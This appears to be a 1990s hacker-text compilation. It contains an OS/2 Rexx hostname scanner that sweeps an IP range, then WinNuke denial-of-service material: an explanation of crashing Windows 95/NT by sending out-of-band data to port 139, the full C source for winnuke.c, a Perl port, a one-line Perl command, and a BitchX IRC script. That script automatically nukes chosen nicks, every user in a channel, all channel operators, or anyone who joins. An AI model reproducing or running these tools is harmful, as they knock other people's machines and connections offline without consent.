PROGRAM
TO SCAN HOST BY IP ADDRESS.......
/* [ http://www.rootshell.com/ ] - Maybe has a
use if you run OS/2? */
/* OS/2 Rexx-script ; scans hosts by IP-adresses */
crlf='0d0a'x
The_End = 0
call RxFuncAdd 'SysLoadFuncs', 'RexxUtil', 'SysLoadFuncs'
call RxFuncAdd 'SockLoadFuncs','rxsock','SockLoadFuncs'
SIGNAL on HALT name CLEANUP
call SysLoadFuncs
call SockLoadFuncs
call SysCls
say ' '
rc = SockVersion()
say ''
say ' SockVersion='rc
rc = SockInit()
say ' '
rc = Charout(,' Enter First IP: ')
pull First_IP .
say ' '
rc = Charout(,' Enter Last IP : ')
pull Last_IP .
say ' '
rc = Charout(,' Enter filename: ')
pull filename .
if filename = '' then filename = 'hostscan.dmp'
say ' '
say ' '
say ' scanning hostnames from 'First_IP 'to 'Last_IP '...'
say ' '
rc = lineout(filename, ' ')
rc = lineout(filename,
'**********************************************************************')
rc = lineout(filename, 'scan results for 'First_IP 'until 'Last_IP '...')
rc = lineout(filename, ' ')
parse value First_IP with D1 '.' C1 '.'B1 '.'A1
parse value Last_IP with D2 '.' C2 '.'B2 '.'A2
do forever
First_IP = D1'.'C1'.'B1'.'A1
say ''
rc = charout(,First_IP' :')
rc = lineout(filename, ' ')
rc = charout(filename,First_IP' :')
rc = SockGetHostByAddr(First_IP, 'host.!')
if (rc = 0) then do
c = charout(,' ** Unable to resolve name ** ')
c = charout(filename,' ** Unable to resolve name ** ')
end
if rc <> 0 then do
rc = charout(,host.!name)
rc = charout(filename,host.!name)
if host.!alias.0 > 1 then do bla = 1 to host.!alias.0
rc= charout(,' | 'host.!alias.bla)
rc= charout(filename,' | 'host.!alias.bla)
end /* do bla */
end
If The_End = 1 then leave
call ipcounter
end /* do forever */
SIGNAL ENDE
ipcounter:
A1 = A1 + 1
if A1 = 256 then do
A1 = 0
B1 = B1 + 1
end /* do */
if B1 = 256 then do
B1 = 0
C1 = C1 +1
end /* do */
if C1 = 256 then do
C1 = 0
D1 = D1 +1
end /* do */
If D1 = D2 then do
If C1 = C2 then do
If B1 = B2 then do
If A1 = A2 then do
The_End = 1
end /* do */
nop
end /* do */
nop
end /* do */
nop
end /* do */
return 0
/* Begin Error-routines */
ENDE:
rc = charout(filename)
say ''
say ''
say ''
say ' Results are in 'filename
say ''
say ''
exit 0
CLEANUP:
say 'CLEANUP'
rc = charout(filename)
say "Done !"
exit 0
SENDING OOB!
It is possible to remotely cause denial of
service to any windows
95/NT user. It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user. NetBIOS [139] seems
to be the most effective since this is a part of windows. Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen. I have heard reports of everything from windows dropping carrier
to the entire screen turning white. Windows also sometimes has trouble
handling anything on a network at all after an attack like this. A
reboot fixes whatever damage this causes. Code follows.
--- CUT HERE ---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
#!/usr/bin/perl
# Ghent - [email protected] - Perl version of winnuke.c by _eci
use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex:
www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print
"Nuked!\n"; close S;
Here is winnuke in one line of perl5.004
perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'
------------wnuke15.irc---------------
# WinNuke BitchX IRC script/wnuke package v 1.5
# Created by maddog and lerper
# [email protected], [email protected]
# WinNuke IRCers with several options:
# the nick you define
# all of the ops in your current channel
# anyone who joins a channel
# everyone in the channel
# Creditz:
# goes out to _eci for winnuke
# #BitchX for their great support
# #ircII for pretending to be asleep whenever i asked for help
# #hack for the laughs (hey--they were talking about vibrators last night)
# Micro$oft for hosting the hacking channels on comic chat
# KL and his LPLC LAX
# shout outs to the L0pht and hey to memebers of "CdC"
# notice: this package was created so more people could learn about winnuke
# and more winblows users could patch themeslves up.
# NOT so lame ircers could have their kicks
#Before using this script, compile the included winnuke.c
#cc -owinnuke winnuke.c should do the job!
#If you have a GNU compiler...replace the cc with gcc
#Then move the executable into your /usr/local/bin directory and
#chmod it with the access levels you wish.
assign wnuke_pgm wnuke
assign wn [wnuke w/ mass nuke features]
assign wi [winnuke commands]
eval echo $wn version 1.5 loading... [ by: maddog and the lerper ]
eval echo $wn type /whelp for commands
alias whelp {
eval echo $wi /wnuke <nick> - sends a win nuke to someone
eval echo $wi /mwnuke - sends a win nuke to everyone on a chan
eval echo $wi /awnuke - when someone joins, it nukes them too, effective
with
mwnuke
eval echo $wi /opwnuke - sends a win nuke to all ops
}
alias wnuke {
if ([$0]) {
^on ^311 "*" {^assign ndomain $3}
^on ^319 "*" #
^whois $0
wait
EVAL ^exec winnuke $1 $ndomain >/dev/null &
echo [wnuke] sent wnuke to $0 at $ndomain requested\.
^on 311 - "*"
^on 319 - "*"
^assign -ndomain
}
{
echo
echo Usage: /wnuke <nick>
}
}
/on -join * {@joinvar=[$0]}
alias awnuke { /on -join * {/wnuke $0}}
alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }}
alias opwnuke { fe ($chops()) blah { /wnuke $blah }}
